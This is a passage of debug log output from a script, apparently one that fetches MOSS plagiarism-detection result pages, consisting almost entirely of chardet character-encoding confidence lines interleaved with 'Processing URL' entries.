Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.52588685464549\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match74-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match74-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match74-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match80-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match80-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match80-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match81-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 20818\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 20805\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 20818\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 20805\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 20805\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 20806\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 20805\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5412885204715342\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5587305145897865\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match81-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match81-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match82-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match82-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match82-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match83-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match83-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match83-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match87-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19082\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19069\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19584\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19082\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 25765\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19571\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19069\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19584\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 25752\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19069\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19571\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 25765\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19070\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19571\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19069\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 25752\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19572\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 25752\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19571\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5433904233402658\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 25753\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match87-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match87-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 25752\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.529678083164815\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5399933395517909\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match86-top.html\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match86-0.html\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match86-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match85-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match85-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match85-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16673\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40953\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16660\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19263\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16673\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32476\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40940\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19250\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16660\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19263\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40953\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16660\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32463\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19250\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40940\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16661\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32476\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19250\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16660\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 40940\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32463\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19251\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40941\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32463\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19250\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40940\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32464\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32463\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5571969105980081\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5471271459674764\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5433467222841619\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match84-top.html\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match84-0.html\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match84-1.html\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5304300423181924\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match91-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match91-0.html\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match91-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match89-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match89-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match89-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24830\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24817\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 25008\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 24830\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24817\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24995\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 25769\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24817\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 25008\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24995\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24818\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 25756\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24995\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 25769\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24817\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24996\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 25756\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24995\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 25756\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 25757\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 25756\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 